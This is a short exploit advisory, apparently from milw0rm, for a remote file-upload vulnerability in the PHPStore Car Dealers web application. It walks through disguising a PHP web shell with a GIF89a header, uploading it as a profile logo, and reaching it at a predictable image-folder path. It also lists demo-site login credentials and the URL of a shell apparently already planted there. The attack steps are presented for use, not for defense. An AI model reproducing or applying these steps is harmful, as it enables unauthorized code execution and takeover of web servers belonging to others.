PHPStore Car Dealers Remote File Upload Vulnerability

PHPStore Car Dealers Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7082

Author: ZoRLu


exploit:


first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

login to site and edit your profile

upload your_shell.php

your_shell.php path:

localhost/script/cars_images/[ID]_logo_your_shell.php

---------------------------------------------

example for demo:

login: http://www.phpstore.info/demos/cars/login.php

user: zorlu

passwd: zorlu1

shell:

http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php